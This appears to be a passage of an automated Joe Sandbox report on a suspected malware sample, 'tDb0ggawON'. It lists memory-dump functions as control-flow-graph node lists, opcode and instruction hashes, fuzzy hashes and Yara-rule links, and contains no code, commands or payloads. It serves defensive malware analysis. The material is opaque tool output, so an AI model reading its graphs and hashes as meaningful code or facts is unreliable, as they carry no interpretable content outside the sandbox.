                                                                                                                                                    control_flow_graph 92 17f3149-17f3155 93 17f315c-17f316e 92->93 94 17f3157 92->94 96 17f318a-17f31aa 93->96 97 17f30a8-17f30c4 93->97 94->93 96->97 98 17f30cd-17f30ce 97->98 99 17f30c6 97->99 102 17f30d3-17f30e5 98->102 116 17f34c7-17f34ce 98->116 99->96 101 17f325e-17f3276 99->101 99->102 103 17f3431-17f3448 99->103 104 17f310f-17f3124 99->104 105 17f332f-17f3346 99->105 106 17f344d-17f3451 99->106 107 17f320d-17f3219 99->107 108 17f330a-17f332a 99->108 109 17f3407-17f342c 99->109 110 17f30e7-17f30f9 99->110 111 17f3126-17f3144 99->111 112 17f3365-17f337c 99->112 113 17f3244-17f3259 99->113 114 17f30a1 99->114 115 17f3381-17f338a 99->115 119 17f327d-17f328f 101->119 120 17f3278 101->120 102->97 103->97 104->97 133 17f3348 call 17f3691 105->133 134 17f3348 call 17f36a0 105->134 123 17f3464-17f346b 106->123 124 17f3453-17f3462 106->124 117 17f321b 107->117 118 17f3220-17f323f 107->118 108->97 109->97 110->97 111->97 112->97 113->97 114->97 121 17f339d-17f33a4 115->121 122 17f338c-17f339b 115->122 117->118 118->97 119->97 120->119 127 17f33ab-17f33b1 121->127 122->127 128 17f3472-17f3478 123->128 124->128 126 17f334e-17f3360 126->97 127->97 128->97 133->126 134->126
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: q"LD$r#HS$r#HS$r#HS$S?2$S?2$S?2
                                                                                                                                                    • API String ID: 0-2581025826
                                                                                                                                                    • Opcode ID: 56ef0808ed7065ebeff44f1699bb75d79fb13dfe29813fbdc9af85ab2b32d5ff
                                                                                                                                                    • Instruction ID: 954a3feb2427d7ed1b13ea7c75c346c0a8eecbb1ecbd15a8192cc4fb0c277c09
                                                                                                                                                    • Opcode Fuzzy Hash: 56ef0808ed7065ebeff44f1699bb75d79fb13dfe29813fbdc9af85ab2b32d5ff
                                                                                                                                                    • Instruction Fuzzy Hash: 88711974E1420ADFCB44CFA5D8818AEFBB2FF89341B64946AD516A7314D734EA42CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F3174 Relevance: 8.9, Strings: 7, Instructions: 166COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 175 17f3174-17f3185 176 17f30a8-17f30c4 175->176 177 17f30cd-17f30ce 176->177 178 17f30c6 176->178 180 17f30d3-17f30e5 177->180 195 17f34c7-17f34ce 177->195 179 17f325e-17f3276 178->179 178->180 181 17f3431-17f3448 178->181 182 17f310f-17f3124 178->182 183 17f332f-17f3346 178->183 184 17f344d-17f3451 178->184 185 17f320d-17f3219 178->185 186 17f318a-17f31aa 178->186 187 17f330a-17f332a 178->187 188 17f3407-17f342c 178->188 189 17f30e7-17f30f9 178->189 190 17f3126-17f3144 178->190 191 17f3365-17f337c 178->191 192 17f3244-17f3259 178->192 193 17f30a1 178->193 194 17f3381-17f338a 178->194 198 17f327d-17f328f 179->198 199 17f3278 179->199 180->176 181->176 182->176 213 17f3348 call 17f3691 183->213 214 17f3348 call 17f36a0 183->214 202 17f3464-17f346b 184->202 203 17f3453-17f3462 184->203 196 17f321b 185->196 197 17f3220-17f323f 185->197 186->176 187->176 188->176 189->176 190->176 191->176 192->176 193->176 200 17f339d-17f33a4 194->200 201 17f338c-17f339b 194->201 196->197 197->176 198->176 199->198 205 17f33ab-17f33b1 200->205 201->205 206 17f3472-17f3478 202->206 203->206 205->176 206->176 208 17f334e-17f3360 208->176 213->208 214->208
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: q"LD$r#HS$r#HS$r#HS$S?2$S?2$S?2
                                                                                                                                                    • API String ID: 0-2581025826
                                                                                                                                                    • Opcode ID: 24e55b40cc454d5e479f8da9fb625448c00b3833ef98a2084ee41d50d7f91b16
                                                                                                                                                    • Instruction ID: b785961d8801b6e78f62aac10622a9fd257c7ebc9cfdf71bb2ced2454ea670e4
                                                                                                                                                    • Opcode Fuzzy Hash: 24e55b40cc454d5e479f8da9fb625448c00b3833ef98a2084ee41d50d7f91b16
                                                                                                                                                    • Instruction Fuzzy Hash: F0711774E1420ADFCB04CFA5D9818AFFBB2FF89241B64946AD516AB314D734DA42CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F30FC Relevance: 8.9, Strings: 7, Instructions: 166COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 135 17f30fc-17f310d 136 17f310f-17f3124 135->136 137 17f30a8-17f30c4 135->137 136->137 138 17f30cd-17f30ce 137->138 139 17f30c6 137->139 141 17f30d3-17f30e5 138->141 155 17f34c7-17f34ce 138->155 139->136 140 17f325e-17f3276 139->140 139->141 142 17f3431-17f3448 139->142 143 17f332f-17f3346 139->143 144 17f344d-17f3451 139->144 145 17f320d-17f3219 139->145 146 17f318a-17f31aa 139->146 147 17f330a-17f332a 139->147 148 17f3407-17f342c 139->148 149 17f30e7-17f30f9 139->149 150 17f3126-17f3144 139->150 151 17f3365-17f337c 139->151 152 17f3244-17f3259 139->152 153 17f30a1 139->153 154 17f3381-17f338a 139->154 158 17f327d-17f328f 140->158 159 17f3278 140->159 141->137 142->137 173 17f3348 call 17f3691 143->173 174 17f3348 call 17f36a0 143->174 162 17f3464-17f346b 144->162 163 17f3453-17f3462 144->163 156 17f321b 145->156 157 17f3220-17f323f 145->157 146->137 147->137 148->137 149->137 150->137 151->137 152->137 153->137 160 17f339d-17f33a4 154->160 161 17f338c-17f339b 154->161 156->157 157->137 158->137 159->158 165 17f33ab-17f33b1 160->165 161->165 166 17f3472-17f3478 162->166 163->166 165->137 166->137 168 17f334e-17f3360 168->137 173->168 174->168
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: q"LD$r#HS$r#HS$r#HS$S?2$S?2$S?2
                                                                                                                                                    • API String ID: 0-2581025826
                                                                                                                                                    • Opcode ID: b8f6e164363f8e1bfde3eab506c2e128ece98bf4a42ee6515c3a2edada13bfba
                                                                                                                                                    • Instruction ID: 23e4868f2ee1061e9b6ce1ff0171e3fdfc987eb03bfe7281f2e68c8aff0e3474
                                                                                                                                                    • Opcode Fuzzy Hash: b8f6e164363f8e1bfde3eab506c2e128ece98bf4a42ee6515c3a2edada13bfba
                                                                                                                                                    • Instruction Fuzzy Hash: 19711874E1420ADFCB04CFA5D9818AFFBB2FF89241B64946AD516A7314D734DA42CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F33F4 Relevance: 8.9, Strings: 7, Instructions: 166COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 215 17f33f4-17f33fc 216 17f33fe 215->216 217 17f3431-17f3448 215->217 218 17f3407-17f342c 216->218 219 17f30a8-17f30c4 217->219 218->219 220 17f30cd-17f30ce 219->220 221 17f30c6 219->221 223 17f30d3-17f30e5 220->223 237 17f34c7-17f34ce 220->237 221->217 221->218 222 17f325e-17f3276 221->222 221->223 224 17f310f-17f3124 221->224 225 17f332f-17f3346 221->225 226 17f344d-17f3451 221->226 227 17f320d-17f3219 221->227 228 17f318a-17f31aa 221->228 229 17f330a-17f332a 221->229 230 17f30e7-17f30f9 221->230 231 17f3126-17f3144 221->231 232 17f3365-17f337c 221->232 233 17f3244-17f3259 221->233 234 17f30a1 221->234 235 17f3381-17f338a 221->235 240 17f327d-17f328f 222->240 241 17f3278 222->241 223->219 224->219 254 17f3348 call 17f3691 225->254 255 17f3348 call 17f36a0 225->255 244 17f3464-17f346b 226->244 245 17f3453-17f3462 226->245 238 17f321b 227->238 239 17f3220-17f323f 227->239 228->219 229->219 230->219 231->219 232->219 233->219 234->219 242 17f339d-17f33a4 235->242 243 17f338c-17f339b 235->243 238->239 239->219 240->219 241->240 249 17f33ab-17f33b1 242->249 243->249 250 17f3472-17f3478 244->250 245->250 248 17f334e-17f3360 248->219 249->219 250->219 254->248 255->248
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: q"LD$r#HS$r#HS$r#HS$S?2$S?2$S?2
                                                                                                                                                    • API String ID: 0-2581025826
                                                                                                                                                    • Opcode ID: 7d6c74840d4e4752cf9d26c74c6476b2be0452ba1001d0f27e364a3f5e8a8819
                                                                                                                                                    • Instruction ID: 90496108a6a18b6ce7f35a762364a16c713450f0f61feee9631b416832becfaf
                                                                                                                                                    • Opcode Fuzzy Hash: 7d6c74840d4e4752cf9d26c74c6476b2be0452ba1001d0f27e364a3f5e8a8819
                                                                                                                                                    • Instruction Fuzzy Hash: 68712774E1420ADFCB08CFA5D8818AFFBB2FF89201B64946AD516A7314D734DA42CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F3401 Relevance: 8.9, Strings: 7, Instructions: 166COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 256 17f3401-17f3403 257 17f3407-17f342c 256->257 259 17f30a8-17f30c4 257->259 260 17f30cd-17f30ce 259->260 261 17f30c6 259->261 263 17f30d3-17f30e5 260->263 277 17f34c7-17f34ce 260->277 261->257 262 17f325e-17f3276 261->262 261->263 264 17f3431-17f3448 261->264 265 17f310f-17f3124 261->265 266 17f332f-17f3346 261->266 267 17f344d-17f3451 261->267 268 17f320d-17f3219 261->268 269 17f318a-17f31aa 261->269 270 17f330a-17f332a 261->270 271 17f30e7-17f30f9 261->271 272 17f3126-17f3144 261->272 273 17f3365-17f337c 261->273 274 17f3244-17f3259 261->274 275 17f30a1 261->275 276 17f3381-17f338a 261->276 280 17f327d-17f328f 262->280 281 17f3278 262->281 263->259 264->259 265->259 294 17f3348 call 17f3691 266->294 295 17f3348 call 17f36a0 266->295 284 17f3464-17f346b 267->284 285 17f3453-17f3462 267->285 278 17f321b 268->278 279 17f3220-17f323f 268->279 269->259 270->259 271->259 272->259 273->259 274->259 275->259 282 17f339d-17f33a4 276->282 283 17f338c-17f339b 276->283 278->279 279->259 280->259 281->280 289 17f33ab-17f33b1 282->289 283->289 290 17f3472-17f3478 284->290 285->290 288 17f334e-17f3360 288->259 289->259 290->259 294->288 295->288
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: q"LD$r#HS$r#HS$r#HS$S?2$S?2$S?2
                                                                                                                                                    • API String ID: 0-2581025826
                                                                                                                                                    • Opcode ID: 8859e6124cae6821f68e54498482ad3ac81d35d2d2fd929042a89a1bed602934
                                                                                                                                                    • Instruction ID: 193f06daf0e1550bdbc1081f204dbda7e61ac6aa42dc3914e029004c8cd30137
                                                                                                                                                    • Opcode Fuzzy Hash: 8859e6124cae6821f68e54498482ad3ac81d35d2d2fd929042a89a1bed602934
                                                                                                                                                    • Instruction Fuzzy Hash: 28712A74E1420ADFCB44CFA5D8818AEFBB2FF89301B64946AD526A7354D734DA42CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09F156D0 Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 391 9f156d0-9f156fe 392 9f15700 391->392 393 9f15705-9f15776 391->393 392->393 395 9f15784-9f1578a 393->395 396 9f15778-9f15782 393->396 398 9f157a3-9f157b3 395->398 396->395 397 9f1578c-9f15796 396->397 399 9f15798 397->399 400 9f1579d-9f157a0 397->400 401 9f157c1-9f157c7 398->401 402 9f157b5-9f157bf 398->402 399->400 400->398 404 9f157e0-9f158c6 call 9f15568 401->404 402->401 403 9f157c9-9f157d3 402->403 405 9f157d5 403->405 406 9f157da-9f157dd 403->406 414 9f158d3-9f158eb 404->414 415 9f158c8-9f158ce 404->415 405->406 406->404 418 9f158f8-9f15944 call 9f15568 414->418 419 9f158ed-9f158f3 414->419 416 9f15cc8-9f15cd1 415->416 424 9f15951-9f15969 418->424 425 9f15946-9f1594c 418->425 419->416 427 9f159db-9f159e1 424->427 428 9f1596b-9f159a9 424->428 425->416 429 9f15a20-9f15a24 427->429 430 9f159e3-9f159e8 427->430 437 9f159b5-9f159d6 428->437 432 9f15a41-9f15a65 429->432 433 9f15a26-9f15a3d 429->433 431 9f159fb-9f15a01 430->431 435 9f15a03-9f15a1b 431->435 436 9f159ea-9f159f8 431->436 440 9f15a6b-9f15a75 432->440 441 9f15bfd-9f15c1e 432->441 433->432 435->416 436->431 437->416 442 9f15aa5-9f15aac 440->442 443 9f15a77-9f15aa0 440->443 451 9f15c20 441->451 452 9f15c25-9f15c3f 441->452 445 9f15add-9f15ae4 442->445 446 9f15aae-9f15ad8 442->446 443->429 449 9f15ae6-9f15b26 445->449 450 9f15b2b-9f15b32 445->450 446->429 449->429 454 9f15b34-9f15b74 450->454 455 9f15b79-9f15b80 450->455 451->452 456 9f15c41 452->456 457 9f15c46-9f15c60 452->457 454->429 460 9f15bc0-9f15bf8 455->460 461 9f15b82-9f15bbb 455->461 456->457 458 9f15c62 457->458 459 9f15c67-9f15c78 457->459 458->459 459->429 463 9f15c7e-9f15c7f 459->463 460->429 461->429 466 9f15ca6-9f15cac 463->466 468 9f15c81-9f15c85 466->468 469 9f15cae-9f15cc6 466->469 470 9f15c92-9f15ca3 468->470 471 9f15c87-9f15c8b 468->471 469->416 470->466 471->470
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.311047408.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9f10000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                                    • Opcode ID: 675f44f985ebd1dfc113d3bb0a9daafc49a0a81b75945d9ac23964cd739a55b4
                                                                                                                                                    • Instruction ID: 930378589d1a04ecb014572a414bdd18f6399f14609f1879c20cbd8a42a3f2cd
                                                                                                                                                    • Opcode Fuzzy Hash: 675f44f985ebd1dfc113d3bb0a9daafc49a0a81b75945d9ac23964cd739a55b4
                                                                                                                                                    • Instruction Fuzzy Hash: DA12BCB5E00218CFDB14CFA9C985AEDBBF2FF88314F248169E919A7245D7349985CF60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F0F7D Relevance: .3, Instructions: 285COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7405eda0d1816198a228891bfe7f8f1b38daff19098634108945ebfce2bd6469
                                                                                                                                                    • Instruction ID: 042c607567d85fe11322b251f195177fadf51a2233b4cca2ef08d2b298fc2c1f
                                                                                                                                                    • Opcode Fuzzy Hash: 7405eda0d1816198a228891bfe7f8f1b38daff19098634108945ebfce2bd6469
                                                                                                                                                    • Instruction Fuzzy Hash: B9C15471E0868A8FDB14CFA9D8406DEFBB2FF99310F18816EE515AB356C770A901CB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017FBFB0 Relevance: .3, Instructions: 273COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: dd961a9feab354290e5bf2f21486029fb20ee7f4e66e69aa805a2145bbe826bc
                                                                                                                                                    • Instruction ID: af5abec445122af36f2163f202b67de4f5644506eb0c2e994b13d802c98fa814
                                                                                                                                                    • Opcode Fuzzy Hash: dd961a9feab354290e5bf2f21486029fb20ee7f4e66e69aa805a2145bbe826bc
                                                                                                                                                    • Instruction Fuzzy Hash: 9BB11770E15209DFCB08DFA5E94559EFFB2FB89200F20D8A9E506AB358DB349942CF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F1020 Relevance: .2, Instructions: 189COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ae06ba243e128ab784c69654fbd4bcd05388f39af3192a48afdf703b9c76c3c0
                                                                                                                                                    • Instruction ID: 941aa11e005a81c10799c282684cac02448bfb12ac3aa9c6d3b5516f72469050
                                                                                                                                                    • Opcode Fuzzy Hash: ae06ba243e128ab784c69654fbd4bcd05388f39af3192a48afdf703b9c76c3c0
                                                                                                                                                    • Instruction Fuzzy Hash: BC81C174E10219CFDB08CFEAC884A9EFBB2AF88300F14852AD519BB358DB749945CF55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05A4043B Relevance: .2, Instructions: 166COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5dd32d72abb7ed5deea099e3b6bfb3c6dd128b333557fa82625df98e03b50083
                                                                                                                                                    • Instruction ID: c6e2cf2e7deef84b06f8bfd6c84583872d26d6a1b148d4409500cc3d913ed940
                                                                                                                                                    • Opcode Fuzzy Hash: 5dd32d72abb7ed5deea099e3b6bfb3c6dd128b333557fa82625df98e03b50083
                                                                                                                                                    • Instruction Fuzzy Hash: 9A615770E1120ADBCB14CFE5C9459AEBBB2FFC9314F10D829E116AB264DB749A01CF60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05A40448 Relevance: .2, Instructions: 165COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1f751925fa89b2ed854a74ddfc36e3101971dab7bdd9504a823bb8a732580a80
                                                                                                                                                    • Instruction ID: fd6360f9fd5966e9ae3fe5d212f1c02da7b8f5d4a177daa0504fa8dea1c5690a
                                                                                                                                                    • Opcode Fuzzy Hash: 1f751925fa89b2ed854a74ddfc36e3101971dab7bdd9504a823bb8a732580a80
                                                                                                                                                    • Instruction Fuzzy Hash: 14614770E1520ADBCB14CFE5C9458AEBBB2FFC9314F10D829E116AB264DB749A01CF60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F1781 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 03f05635ad04a1dee50891c973d9702165aff943c7151cf57e816d7141366934
                                                                                                                                                    • Instruction ID: 5ac72920b8cc3c5db3239824c2ccec887063730ec8b4a1d560b9f80185c52f1d
                                                                                                                                                    • Opcode Fuzzy Hash: 03f05635ad04a1dee50891c973d9702165aff943c7151cf57e816d7141366934
                                                                                                                                                    • Instruction Fuzzy Hash: D051F674E0520ACFDB08CFAAC9406AEFBF2EF89300F54D46AD519A7355D7349A418FA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F1790 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4e692a10dd6f1be35d2d71dfb21b081d5f3f9f49034def2f8906087186895627
                                                                                                                                                    • Instruction ID: 9c3f58960b731c078046967fa301c6c438e72415a1ef8a63c3d1aa51b0fd042e
                                                                                                                                                    • Opcode Fuzzy Hash: 4e692a10dd6f1be35d2d71dfb21b081d5f3f9f49034def2f8906087186895627
                                                                                                                                                    • Instruction Fuzzy Hash: 4651E474E0520ACFDB08CFAAC9446AEFBF2EF89300F54D46AD519A7354D7349A418FA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F0471 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a15918d5ddc052388730517ea0a245d1762da8f69ff4c22cd177989ddf8f3613
                                                                                                                                                    • Instruction ID: f574f160574ad78bde3365efe1a164e1444f7817c716be0a64c02b8d727ab8bf
                                                                                                                                                    • Opcode Fuzzy Hash: a15918d5ddc052388730517ea0a245d1762da8f69ff4c22cd177989ddf8f3613
                                                                                                                                                    • Instruction Fuzzy Hash: A631F970E046188FEB19CFABDC4079EFBF3AFC9200F18C5AAD508AA255DB7009458F51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F0480 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ed7e182d126d799485c07c0417b093984b1d97fa1d57820dd2535fa0c23c44a7
                                                                                                                                                    • Instruction ID: 78d99e2e34dc2288a96f14177a5dff6055cb067799796039892de746f0451681
                                                                                                                                                    • Opcode Fuzzy Hash: ed7e182d126d799485c07c0417b093984b1d97fa1d57820dd2535fa0c23c44a7
                                                                                                                                                    • Instruction Fuzzy Hash: 7121A671E016189BEB58CFABD8406DEFBF7AFC9200F14C5BAD508A6354EB301A558F51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F2140 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0d7e42a23c178d176ddb8b76268c135c7030d3a43dc127deafebe94f800bc6fc
                                                                                                                                                    • Instruction ID: 62a51669a7db7786c02ec9eaa97b9bb2cbd563a2324657fd99a7513fc659ee4d
                                                                                                                                                    • Opcode Fuzzy Hash: 0d7e42a23c178d176ddb8b76268c135c7030d3a43dc127deafebe94f800bc6fc
                                                                                                                                                    • Instruction Fuzzy Hash: 8E21F371E006188BDB18CFAADC446DEFBF7AFC8310F18C16AD509A6268DB745A55CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F2130 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b5581c260e6d50d5da653a06c845dd128d2d369541fe7e8f2262fc393a0efa48
                                                                                                                                                    • Instruction ID: 42e5adfa9b8ec3a73a04361c0c17b1039118cfe7dfb475ea88f342b40bf9a9fc
                                                                                                                                                    • Opcode Fuzzy Hash: b5581c260e6d50d5da653a06c845dd128d2d369541fe7e8f2262fc393a0efa48
                                                                                                                                                    • Instruction Fuzzy Hash: B621F871E006188BEB19CFAADC443DEBBF3AFC9310F18C06AD409AA268DB741955CF51
                                                                                                                                                    Uniqueness

